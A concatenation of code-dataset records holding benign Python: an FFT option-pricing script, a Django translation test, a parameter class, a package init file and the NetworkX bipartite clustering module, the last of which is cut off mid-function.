self.__alpha\n h = B / (N - 1)\n omega = np.arange(0, N) * h\n dk = 2 * np.pi / (h * N)\n k = np.log(20) + np.arange(0, N) * dk\n dw = np.zeros(N)\n dw[0] = h / 2\n dw[1:] = h\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1.0j * omega * k[n]) * nu_hat * dw)\n V[n] = (np.exp(-alpha * k[n]) / np.pi * inner_sum).real\n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n\n def __repr__(self):\n return 'FFTPricing({}, {}, {}, {}, {}, {})'.format(self.__option,\n self.__r, self.__sigma, self.__N, self.__B, self.__alpha)\n\n\nif __name__ == '__main__':\n from option import European\n S0 = 100\n K = 110\n r = 0.1\n T = 1\n volatility = 0.25\n N = 2 ** 10\n B = 50\n alpha = 10.0\n print(\n '------------------------------------------------------------------' +\n '----------------------------')\n option = European(S0, K, T, 'Call')\n fftPricing = FFTPricing(option, r, volatility, N, B, alpha)\n print(fftPricing)\n print('FFT price for Call:', fftPricing.optionPrice())\n print(\n '------------------------------------------------------------------' +\n '----------------------------')\n option = European(S0, K, T, 'Put')\n fftPricing = FFTPricing(option, r, volatility, N, B, -alpha)\n print(fftPricing)\n print('FFT price for Put:', fftPricing.optionPrice())\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 14 01:32:26 2019\n\n@author: himanshu\n\"\"\"\n\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom option import Option\n\nclass FFTPricing:\n \n def __init__(self,\n option : Option,\n riskFreeRate,\n volatility,\n samplePoints,\n bandwidth,\n dampingFactor,\n underlyingModel = 'GBM'):\n \n self.__option = option\n self.__r = riskFreeRate\n self.__sigma = volatility\n self.__N = samplePoints\n self.__B = bandwidth\n self.__alpha = dampingFactor\n self.__model = underlyingModel\n \n \n # Computes the characterstic function of a GBM.\n def __charactersticFunc(self, omega):\n S0 = self.__option.underlyingPrice\n r = self.__r\n T = self.__option.timeToExpiry\n sigma = self.__sigma\n alpha = self.__alpha\n \n if self.__model == 'GBM':\n x0 = np.log(S0)\n mu = x0 + ((r - (sigma**2)/2)*(T))\n sig = (sigma**2)*(T)/2\n omega_prime = omega + 1j*(alpha+1)\n return np.exp(-1j*mu*omega_prime - sig*(omega_prime**2))\n elif self.__model == 'VG':\n pass\n \n # Computes the Fourier Transform of a GBM.\n def __fourierTransform(self, omega):\n alpha = self.__alpha\n r = self.__r\n T = self.__option.timeToExpiry\n \n q_hat = self.__charactersticFunc(omega)\n num = np.exp(-r*(T))*q_hat\n den = (alpha - 1j*omega)*(alpha - (1j*omega) + 1)\n return num/den\n \n def optionPrice(self):\n if not self.__option.expiryType == 'European':\n print('Not a European Option')\n return 0.0\n \n K = self.__option.strikePrice\n \n N = self.__N\n B = self.__B\n alpha = self.__alpha\n \n h = B/(N-1)\n omega = np.arange(0,N)*h\n \n dk = 2*np.pi/(h*N)\n k = np.log(20) + np.arange(0,N)*dk\n \n dw = np.zeros(N)\n dw[0] = h/2\n dw[1:] = h\n \n # FFT Algorithm\n V = np.zeros(N)\n for n in range(N):\n nu_hat = self.__fourierTransform(omega)\n inner_sum = np.sum(np.exp(1j*omega*k[n])*nu_hat*dw)\n V[n] = ((np.exp(-alpha*k[n])/np.pi)*inner_sum).real\n \n val = interp1d(k, V)\n return float('{0:.2f}'.format(val(np.log(K))))\n \n def __repr__(self):\n \n return \"FFTPricing({}, {}, {}, {}, {}, {})\"\\\n .format(self.__option,\n self.__r,\n self.__sigma,\n self.__N,\n self.__B,\n self.__alpha)\n \nif __name__ == \"__main__\":\n from option import European\n S0 = 100\n K = 110\n r = 0.10\n T = 1\n volatility = 0.25\n \n N = 2**10\n B = 50\n alpha = 10.0\n \n print('------------------------------------------------------------------'\n +'----------------------------')\n option = European(S0, K, T, 'Call')\n fftPricing = FFTPricing(option, r, volatility, N, B, alpha)\n print(fftPricing)\n print('FFT price for Call:', fftPricing.optionPrice())\n \n print('------------------------------------------------------------------'\n +'----------------------------')\n option = European(S0, K, T, 'Put')\n fftPricing = FFTPricing(option, r, volatility, N, B, -alpha)\n print(fftPricing)\n print('FFT price for Put:', fftPricing.optionPrice())\n ",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
class CompetenceTest(TestCase):
<|reserved_special_token_0|>
def test_translation(self):
competence = Competence.objects.first()
self.assertEqual(competence.name, 'mining')
competence.set_current_language('sv')
self.assertEqual(competence.name, 'gruvarbete')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CompetenceTest(TestCase):
<|reserved_special_token_0|>
def test_translation(self):
competence = Competence.objects.first()
self.assertEqual(competence.name, 'mining')
competence.set_current_language('sv')
self.assertEqual(competence.name, 'gruvarbete')
def test_translation_fallback(self):
competence = Competence.objects.first()
competence.set_current_language('fi')
self.assertEqual(competence.name, 'mining')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CompetenceTest(TestCase):
def setUp(self):
self.competence = Competence.objects.create(name='mining')
self.competence.set_current_language('sv')
self.competence.name = 'gruvarbete'
self.competence.save()
def test_translation(self):
competence = Competence.objects.first()
self.assertEqual(competence.name, 'mining')
competence.set_current_language('sv')
self.assertEqual(competence.name, 'gruvarbete')
def test_translation_fallback(self):
competence = Competence.objects.first()
competence.set_current_language('fi')
self.assertEqual(competence.name, 'mining')
<|reserved_special_token_1|>
from django.test import TestCase
from recruitmentapp.apps.core.models import Competence
class CompetenceTest(TestCase):
def setUp(self):
self.competence = Competence.objects.create(name='mining')
self.competence.set_current_language('sv')
self.competence.name = 'gruvarbete'
self.competence.save()
def test_translation(self):
competence = Competence.objects.first()
self.assertEqual(competence.name, 'mining')
competence.set_current_language('sv')
self.assertEqual(competence.name, 'gruvarbete')
def test_translation_fallback(self):
competence = Competence.objects.first()
competence.set_current_language('fi')
self.assertEqual(competence.name, 'mining')
|
flexible
|
{
"blob_id": "d7b0ff6549d854d21ad1d2d0f5a9e7f75f4ac1d5",
"index": 956,
"step-1": "<mask token>\n\n\nclass CompetenceTest(TestCase):\n <mask token>\n\n def test_translation(self):\n competence = Competence.objects.first()\n self.assertEqual(competence.name, 'mining')\n competence.set_current_language('sv')\n self.assertEqual(competence.name, 'gruvarbete')\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass CompetenceTest(TestCase):\n <mask token>\n\n def test_translation(self):\n competence = Competence.objects.first()\n self.assertEqual(competence.name, 'mining')\n competence.set_current_language('sv')\n self.assertEqual(competence.name, 'gruvarbete')\n\n def test_translation_fallback(self):\n competence = Competence.objects.first()\n competence.set_current_language('fi')\n self.assertEqual(competence.name, 'mining')\n",
"step-3": "<mask token>\n\n\nclass CompetenceTest(TestCase):\n\n def setUp(self):\n self.competence = Competence.objects.create(name='mining')\n self.competence.set_current_language('sv')\n self.competence.name = 'gruvarbete'\n self.competence.save()\n\n def test_translation(self):\n competence = Competence.objects.first()\n self.assertEqual(competence.name, 'mining')\n competence.set_current_language('sv')\n self.assertEqual(competence.name, 'gruvarbete')\n\n def test_translation_fallback(self):\n competence = Competence.objects.first()\n competence.set_current_language('fi')\n self.assertEqual(competence.name, 'mining')\n",
"step-4": "from django.test import TestCase\nfrom recruitmentapp.apps.core.models import Competence\n\n\nclass CompetenceTest(TestCase):\n\n def setUp(self):\n self.competence = Competence.objects.create(name='mining')\n self.competence.set_current_language('sv')\n self.competence.name = 'gruvarbete'\n self.competence.save()\n\n def test_translation(self):\n competence = Competence.objects.first()\n self.assertEqual(competence.name, 'mining')\n competence.set_current_language('sv')\n self.assertEqual(competence.name, 'gruvarbete')\n\n def test_translation_fallback(self):\n competence = Competence.objects.first()\n competence.set_current_language('fi')\n self.assertEqual(competence.name, 'mining')\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
class tenDParameters:
def __init__(self,
b: float,
DM: float,
pm_l: float,
pm_b: float,
vrad: float,
sb: float,
spml: float,
spmb: float,
sdm: float,
vc: float):
self.b = b
self.DM = DM
# this is actually pm_l * cos b, apparently
self.pm_l = pm_l
self.pm_b = pm_b
self.vrad = vrad
self.sb = sb
self.spml = spml
self.spmb = spmb
self.sdm = sdm
self.vc = vc
|
normal
|
{
"blob_id": "82e7e22293551e061dcb295c52714c22df0ed0ce",
"index": 5678,
"step-1": "<mask token>\n",
"step-2": "class tenDParameters:\n <mask token>\n",
"step-3": "class tenDParameters:\n\n def __init__(self, b: float, DM: float, pm_l: float, pm_b: float, vrad:\n float, sb: float, spml: float, spmb: float, sdm: float, vc: float):\n self.b = b\n self.DM = DM\n self.pm_l = pm_l\n self.pm_b = pm_b\n self.vrad = vrad\n self.sb = sb\n self.spml = spml\n self.spmb = spmb\n self.sdm = sdm\n self.vc = vc\n",
"step-4": "class tenDParameters:\n def __init__(self,\n b: float,\n DM: float,\n pm_l: float,\n pm_b: float,\n vrad: float,\n sb: float,\n spml: float,\n spmb: float,\n sdm: float,\n vc: float):\n self.b = b\n self.DM = DM\n # this is actually pm_l * cos b, apparently\n self.pm_l = pm_l\n self.pm_b = pm_b\n self.vrad = vrad\n self.sb = sb\n self.spml = spml\n self.spmb = spmb\n self.sdm = sdm\n self.vc = vc",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from .string_helper import camelize, uncamelize, camelize_for_dict_key, camelize_for_dict_key_in_list, uncamelize_for_dict_key, uncamelize_for_dict_key_in_list
from .datetime_helper import datetime_format
from .class_helper import override
from .paginate import paginate2dict
from .json_type import JsonType
from .request import RequestDict
from .response import ResponseJson
from .api_helper import gen_links, gen_pagination, sort_list
from .api_helper import eliminate_key, remain_key
<|reserved_special_token_1|>
# coding=utf-8
# flake8:noqa
from .string_helper import (
camelize, uncamelize,
camelize_for_dict_key, camelize_for_dict_key_in_list,
uncamelize_for_dict_key, uncamelize_for_dict_key_in_list
)
from .datetime_helper import datetime_format
from .class_helper import override
from .paginate import paginate2dict
from .json_type import JsonType
from .request import RequestDict
from .response import ResponseJson
from .api_helper import gen_links, gen_pagination, sort_list
from .api_helper import eliminate_key, remain_key
|
flexible
|
{
"blob_id": "64a590d31be98f7639034662b2a322e5572cc1ae",
"index": 3554,
"step-1": "<mask token>\n",
"step-2": "from .string_helper import camelize, uncamelize, camelize_for_dict_key, camelize_for_dict_key_in_list, uncamelize_for_dict_key, uncamelize_for_dict_key_in_list\nfrom .datetime_helper import datetime_format\nfrom .class_helper import override\nfrom .paginate import paginate2dict\nfrom .json_type import JsonType\nfrom .request import RequestDict\nfrom .response import ResponseJson\nfrom .api_helper import gen_links, gen_pagination, sort_list\nfrom .api_helper import eliminate_key, remain_key\n",
"step-3": "# coding=utf-8\n# flake8:noqa\n\nfrom .string_helper import (\n camelize, uncamelize,\n camelize_for_dict_key, camelize_for_dict_key_in_list,\n uncamelize_for_dict_key, uncamelize_for_dict_key_in_list\n)\nfrom .datetime_helper import datetime_format\nfrom .class_helper import override\n\nfrom .paginate import paginate2dict\nfrom .json_type import JsonType\nfrom .request import RequestDict\nfrom .response import ResponseJson\nfrom .api_helper import gen_links, gen_pagination, sort_list\nfrom .api_helper import eliminate_key, remain_key\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def cc_dot(nu, nv):
return float(len(nu & nv)) / len(nu | nv)
def cc_max(nu, nv):
return float(len(nu & nv)) / max(len(nu), len(nv))
<|reserved_special_token_0|>
def average_clustering(G, nodes=None, mode='dot'):
"""Compute the average bipartite clustering coefficient.
A clustering coefficient for the whole graph is the average,
.. math::
C = \\frac{1}{n}\\sum_{v \\in G} c_v,
where `n` is the number of nodes in `G`.
Similar measures for the two bipartite sets can be defined [1]_
.. math::
C_X = \\frac{1}{|X|}\\sum_{v \\in X} c_v,
where `X` is a bipartite set of `G`.
Parameters
----------
G : graph
a bipartite graph
nodes : list or iterable, optional
A container of nodes to use in computing the average.
The nodes should be either the entire graph (the default) or one of the
bipartite sets.
mode : string
The pariwise bipartite clustering method.
It must be "dot", "max", or "min"
Returns
-------
clustering : float
The average bipartite clustering for the given set of nodes or the
entire graph if no nodes are specified.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G=nx.star_graph(3) # star graphs are bipartite
>>> bipartite.average_clustering(G)
0.75
>>> X,Y=bipartite.sets(G)
>>> bipartite.average_clustering(G,X)
0.0
>>> bipartite.average_clustering(G,Y)
1.0
See Also
--------
clustering
Notes
-----
The container of nodes passed to this function must contain all of the nodes
in one of the bipartite sets ("top" or "bottom") in order to compute
the correct average bipartite clustering coefficients.
See :mod:`bipartite documentation <networkx.algorithms.bipartite>`
for further details on how bipartite graphs are handled in NetworkX.
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if nodes is None:
nodes = G
ccs = latapy_clustering(G, nodes=nodes, mode=mode)
return float(sum(ccs[v] for v in nodes)) / len(nodes)
def robins_alexander_clustering(G):
"""Compute the bipartite clustering of G.
Robins and Alexander [1]_ defined bipartite clustering coefficient as
four times the number of four cycles `C_4` divided by the number of
three paths `L_3` in a bipartite graph:
.. math::
CC_4 = \\frac{4 * C_4}{L_3}
Parameters
----------
G : graph
a bipartite graph
Returns
-------
clustering : float
The Robins and Alexander bipartite clustering for the input graph.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.davis_southern_women_graph()
>>> print(round(bipartite.robins_alexander_clustering(G), 3))
0.468
See Also
--------
latapy_clustering
square_clustering
References
----------
.. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking
directors: Network structure and distance in bipartite graphs.
Computational & Mathematical Organization Theory 10(1), 69–94.
"""
if G.order() < 4 or G.size() < 3:
return 0
L_3 = _threepaths(G)
if L_3 == 0:
return 0
C_4 = _four_cycles(G)
return 4.0 * C_4 / L_3
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def cc_dot(nu, nv):
return float(len(nu & nv)) / len(nu | nv)
def cc_max(nu, nv):
return float(len(nu & nv)) / max(len(nu), len(nv))
def cc_min(nu, nv):
return float(len(nu & nv)) / min(len(nu), len(nv))
<|reserved_special_token_0|>
def latapy_clustering(G, nodes=None, mode='dot'):
"""Compute a bipartite clustering coefficient for nodes.
The bipartie clustering coefficient is a measure of local density
of connections defined as [1]_:
.. math::
c_u = \\frac{\\sum_{v \\in N(N(u))} c_{uv} }{|N(N(u))|}
where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`,
and `c_{uv}` is the pairwise clustering coefficient between nodes
`u` and `v`.
The mode selects the function for `c_{uv}` which can be:
`dot`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{|N(u) \\cup N(v)|}
`min`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{min(|N(u)|,|N(v)|)}
`max`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{max(|N(u)|,|N(v)|)}
Parameters
----------
G : graph
A bipartite graph
nodes : list or iterable (optional)
Compute bipartite clustering for these nodes. The default
is all nodes in G.
mode : string
The pariwise bipartite clustering method to be used in the computation.
It must be "dot", "max", or "min".
Returns
-------
clustering : dictionary
A dictionary keyed by node with the clustering coefficient value.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.path_graph(4) # path graphs are bipartite
>>> c = bipartite.clustering(G)
>>> c[0]
0.5
>>> c = bipartite.clustering(G,mode='min')
>>> c[0]
1.0
See Also
--------
robins_alexander_clustering
square_clustering
average_clustering
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if not nx.algorithms.bipartite.is_bipartite(G):
raise nx.NetworkXError('Graph is not bipartite')
try:
cc_func = modes[mode]
except KeyError:
raise nx.NetworkXError(
'Mode for bipartite clustering must be: dot, min or max')
if nodes is None:
nodes = G
ccs = {}
for v in nodes:
cc = 0.0
nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])
for u in nbrs2:
cc += cc_func(set(G[u]), set(G[v]))
if cc > 0.0:
cc /= len(nbrs2)
ccs[v] = cc
return ccs
<|reserved_special_token_0|>
def average_clustering(G, nodes=None, mode='dot'):
"""Compute the average bipartite clustering coefficient.
A clustering coefficient for the whole graph is the average,
.. math::
C = \\frac{1}{n}\\sum_{v \\in G} c_v,
where `n` is the number of nodes in `G`.
Similar measures for the two bipartite sets can be defined [1]_
.. math::
C_X = \\frac{1}{|X|}\\sum_{v \\in X} c_v,
where `X` is a bipartite set of `G`.
Parameters
----------
G : graph
a bipartite graph
nodes : list or iterable, optional
A container of nodes to use in computing the average.
The nodes should be either the entire graph (the default) or one of the
bipartite sets.
mode : string
The pariwise bipartite clustering method.
It must be "dot", "max", or "min"
Returns
-------
clustering : float
The average bipartite clustering for the given set of nodes or the
entire graph if no nodes are specified.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G=nx.star_graph(3) # star graphs are bipartite
>>> bipartite.average_clustering(G)
0.75
>>> X,Y=bipartite.sets(G)
>>> bipartite.average_clustering(G,X)
0.0
>>> bipartite.average_clustering(G,Y)
1.0
See Also
--------
clustering
Notes
-----
The container of nodes passed to this function must contain all of the nodes
in one of the bipartite sets ("top" or "bottom") in order to compute
the correct average bipartite clustering coefficients.
See :mod:`bipartite documentation <networkx.algorithms.bipartite>`
for further details on how bipartite graphs are handled in NetworkX.
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if nodes is None:
nodes = G
ccs = latapy_clustering(G, nodes=nodes, mode=mode)
return float(sum(ccs[v] for v in nodes)) / len(nodes)
def robins_alexander_clustering(G):
"""Compute the bipartite clustering of G.
Robins and Alexander [1]_ defined bipartite clustering coefficient as
four times the number of four cycles `C_4` divided by the number of
three paths `L_3` in a bipartite graph:
.. math::
CC_4 = \\frac{4 * C_4}{L_3}
Parameters
----------
G : graph
a bipartite graph
Returns
-------
clustering : float
The Robins and Alexander bipartite clustering for the input graph.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.davis_southern_women_graph()
>>> print(round(bipartite.robins_alexander_clustering(G), 3))
0.468
See Also
--------
latapy_clustering
square_clustering
References
----------
.. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking
directors: Network structure and distance in bipartite graphs.
Computational & Mathematical Organization Theory 10(1), 69–94.
"""
if G.order() < 4 or G.size() < 3:
return 0
L_3 = _threepaths(G)
if L_3 == 0:
return 0
C_4 = _four_cycles(G)
return 4.0 * C_4 / L_3
def _four_cycles(G):
cycles = 0
for v in G:
for u, w in itertools.combinations(G[v], 2):
cycles += len((set(G[u]) & set(G[w])) - set([v]))
return cycles / 4
def _threepaths(G):
paths = 0
for v in G:
for u in G[v]:
for w in (set(G[u]) - set([v])):
paths += len(set(G[w]) - set([v, u]))
return paths / 2
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__author__ = '\n'.join(['Jordi Torrents <jtorrents@milnou.net>',
'Aric Hagberg (hagberg@lanl.gov)'])
__all__ = ['clustering', 'average_clustering', 'latapy_clustering',
'robins_alexander_clustering']
def cc_dot(nu, nv):
return float(len(nu & nv)) / len(nu | nv)
def cc_max(nu, nv):
return float(len(nu & nv)) / max(len(nu), len(nv))
def cc_min(nu, nv):
return float(len(nu & nv)) / min(len(nu), len(nv))
modes = {'dot': cc_dot, 'min': cc_min, 'max': cc_max}
def latapy_clustering(G, nodes=None, mode='dot'):
"""Compute a bipartite clustering coefficient for nodes.
The bipartie clustering coefficient is a measure of local density
of connections defined as [1]_:
.. math::
c_u = \\frac{\\sum_{v \\in N(N(u))} c_{uv} }{|N(N(u))|}
where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`,
and `c_{uv}` is the pairwise clustering coefficient between nodes
`u` and `v`.
The mode selects the function for `c_{uv}` which can be:
`dot`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{|N(u) \\cup N(v)|}
`min`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{min(|N(u)|,|N(v)|)}
`max`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{max(|N(u)|,|N(v)|)}
Parameters
----------
G : graph
A bipartite graph
nodes : list or iterable (optional)
Compute bipartite clustering for these nodes. The default
is all nodes in G.
mode : string
The pariwise bipartite clustering method to be used in the computation.
It must be "dot", "max", or "min".
Returns
-------
clustering : dictionary
A dictionary keyed by node with the clustering coefficient value.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.path_graph(4) # path graphs are bipartite
>>> c = bipartite.clustering(G)
>>> c[0]
0.5
>>> c = bipartite.clustering(G,mode='min')
>>> c[0]
1.0
See Also
--------
robins_alexander_clustering
square_clustering
average_clustering
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if not nx.algorithms.bipartite.is_bipartite(G):
raise nx.NetworkXError('Graph is not bipartite')
try:
cc_func = modes[mode]
except KeyError:
raise nx.NetworkXError(
'Mode for bipartite clustering must be: dot, min or max')
if nodes is None:
nodes = G
ccs = {}
for v in nodes:
cc = 0.0
nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])
for u in nbrs2:
cc += cc_func(set(G[u]), set(G[v]))
if cc > 0.0:
cc /= len(nbrs2)
ccs[v] = cc
return ccs
clustering = latapy_clustering
def average_clustering(G, nodes=None, mode='dot'):
"""Compute the average bipartite clustering coefficient.
A clustering coefficient for the whole graph is the average,
.. math::
C = \\frac{1}{n}\\sum_{v \\in G} c_v,
where `n` is the number of nodes in `G`.
Similar measures for the two bipartite sets can be defined [1]_
.. math::
C_X = \\frac{1}{|X|}\\sum_{v \\in X} c_v,
where `X` is a bipartite set of `G`.
Parameters
----------
G : graph
a bipartite graph
nodes : list or iterable, optional
A container of nodes to use in computing the average.
The nodes should be either the entire graph (the default) or one of the
bipartite sets.
mode : string
The pariwise bipartite clustering method.
It must be "dot", "max", or "min"
Returns
-------
clustering : float
The average bipartite clustering for the given set of nodes or the
entire graph if no nodes are specified.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G=nx.star_graph(3) # star graphs are bipartite
>>> bipartite.average_clustering(G)
0.75
>>> X,Y=bipartite.sets(G)
>>> bipartite.average_clustering(G,X)
0.0
>>> bipartite.average_clustering(G,Y)
1.0
See Also
--------
clustering
Notes
-----
The container of nodes passed to this function must contain all of the nodes
in one of the bipartite sets ("top" or "bottom") in order to compute
the correct average bipartite clustering coefficients.
See :mod:`bipartite documentation <networkx.algorithms.bipartite>`
for further details on how bipartite graphs are handled in NetworkX.
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if nodes is None:
nodes = G
ccs = latapy_clustering(G, nodes=nodes, mode=mode)
return float(sum(ccs[v] for v in nodes)) / len(nodes)
def robins_alexander_clustering(G):
"""Compute the bipartite clustering of G.
Robins and Alexander [1]_ defined bipartite clustering coefficient as
four times the number of four cycles `C_4` divided by the number of
three paths `L_3` in a bipartite graph:
.. math::
CC_4 = \\frac{4 * C_4}{L_3}
Parameters
----------
G : graph
a bipartite graph
Returns
-------
clustering : float
The Robins and Alexander bipartite clustering for the input graph.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.davis_southern_women_graph()
>>> print(round(bipartite.robins_alexander_clustering(G), 3))
0.468
See Also
--------
latapy_clustering
square_clustering
References
----------
.. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking
directors: Network structure and distance in bipartite graphs.
Computational & Mathematical Organization Theory 10(1), 69–94.
"""
if G.order() < 4 or G.size() < 3:
return 0
L_3 = _threepaths(G)
if L_3 == 0:
return 0
C_4 = _four_cycles(G)
return 4.0 * C_4 / L_3
def _four_cycles(G):
cycles = 0
for v in G:
for u, w in itertools.combinations(G[v], 2):
cycles += len((set(G[u]) & set(G[w])) - set([v]))
return cycles / 4
def _threepaths(G):
paths = 0
for v in G:
for u in G[v]:
for w in (set(G[u]) - set([v])):
paths += len(set(G[w]) - set([v, u]))
return paths / 2
<|reserved_special_token_1|>
import itertools
import networkx as nx
__author__ = '\n'.join(['Jordi Torrents <jtorrents@milnou.net>',
'Aric Hagberg (hagberg@lanl.gov)'])
__all__ = ['clustering', 'average_clustering', 'latapy_clustering',
'robins_alexander_clustering']
def cc_dot(nu, nv):
return float(len(nu & nv)) / len(nu | nv)
def cc_max(nu, nv):
return float(len(nu & nv)) / max(len(nu), len(nv))
def cc_min(nu, nv):
return float(len(nu & nv)) / min(len(nu), len(nv))
modes = {'dot': cc_dot, 'min': cc_min, 'max': cc_max}
def latapy_clustering(G, nodes=None, mode='dot'):
"""Compute a bipartite clustering coefficient for nodes.
The bipartie clustering coefficient is a measure of local density
of connections defined as [1]_:
.. math::
c_u = \\frac{\\sum_{v \\in N(N(u))} c_{uv} }{|N(N(u))|}
where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`,
and `c_{uv}` is the pairwise clustering coefficient between nodes
`u` and `v`.
The mode selects the function for `c_{uv}` which can be:
`dot`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{|N(u) \\cup N(v)|}
`min`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{min(|N(u)|,|N(v)|)}
`max`:
.. math::
c_{uv}=\\frac{|N(u)\\cap N(v)|}{max(|N(u)|,|N(v)|)}
Parameters
----------
G : graph
A bipartite graph
nodes : list or iterable (optional)
Compute bipartite clustering for these nodes. The default
is all nodes in G.
mode : string
The pariwise bipartite clustering method to be used in the computation.
It must be "dot", "max", or "min".
Returns
-------
clustering : dictionary
A dictionary keyed by node with the clustering coefficient value.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.path_graph(4) # path graphs are bipartite
>>> c = bipartite.clustering(G)
>>> c[0]
0.5
>>> c = bipartite.clustering(G,mode='min')
>>> c[0]
1.0
See Also
--------
robins_alexander_clustering
square_clustering
average_clustering
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if not nx.algorithms.bipartite.is_bipartite(G):
raise nx.NetworkXError('Graph is not bipartite')
try:
cc_func = modes[mode]
except KeyError:
raise nx.NetworkXError(
'Mode for bipartite clustering must be: dot, min or max')
if nodes is None:
nodes = G
ccs = {}
for v in nodes:
cc = 0.0
nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])
for u in nbrs2:
cc += cc_func(set(G[u]), set(G[v]))
if cc > 0.0:
cc /= len(nbrs2)
ccs[v] = cc
return ccs
clustering = latapy_clustering
def average_clustering(G, nodes=None, mode='dot'):
"""Compute the average bipartite clustering coefficient.
A clustering coefficient for the whole graph is the average,
.. math::
C = \\frac{1}{n}\\sum_{v \\in G} c_v,
where `n` is the number of nodes in `G`.
Similar measures for the two bipartite sets can be defined [1]_
.. math::
C_X = \\frac{1}{|X|}\\sum_{v \\in X} c_v,
where `X` is a bipartite set of `G`.
Parameters
----------
G : graph
a bipartite graph
nodes : list or iterable, optional
A container of nodes to use in computing the average.
The nodes should be either the entire graph (the default) or one of the
bipartite sets.
mode : string
The pariwise bipartite clustering method.
It must be "dot", "max", or "min"
Returns
-------
clustering : float
The average bipartite clustering for the given set of nodes or the
entire graph if no nodes are specified.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G=nx.star_graph(3) # star graphs are bipartite
>>> bipartite.average_clustering(G)
0.75
>>> X,Y=bipartite.sets(G)
>>> bipartite.average_clustering(G,X)
0.0
>>> bipartite.average_clustering(G,Y)
1.0
See Also
--------
clustering
Notes
-----
The container of nodes passed to this function must contain all of the nodes
in one of the bipartite sets ("top" or "bottom") in order to compute
the correct average bipartite clustering coefficients.
See :mod:`bipartite documentation <networkx.algorithms.bipartite>`
for further details on how bipartite graphs are handled in NetworkX.
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if nodes is None:
nodes = G
ccs = latapy_clustering(G, nodes=nodes, mode=mode)
return float(sum(ccs[v] for v in nodes)) / len(nodes)
def robins_alexander_clustering(G):
"""Compute the bipartite clustering of G.
Robins and Alexander [1]_ defined bipartite clustering coefficient as
four times the number of four cycles `C_4` divided by the number of
three paths `L_3` in a bipartite graph:
.. math::
CC_4 = \\frac{4 * C_4}{L_3}
Parameters
----------
G : graph
a bipartite graph
Returns
-------
clustering : float
The Robins and Alexander bipartite clustering for the input graph.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.davis_southern_women_graph()
>>> print(round(bipartite.robins_alexander_clustering(G), 3))
0.468
See Also
--------
latapy_clustering
square_clustering
References
----------
.. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking
directors: Network structure and distance in bipartite graphs.
Computational & Mathematical Organization Theory 10(1), 69–94.
"""
if G.order() < 4 or G.size() < 3:
return 0
L_3 = _threepaths(G)
if L_3 == 0:
return 0
C_4 = _four_cycles(G)
return 4.0 * C_4 / L_3
def _four_cycles(G):
cycles = 0
for v in G:
for u, w in itertools.combinations(G[v], 2):
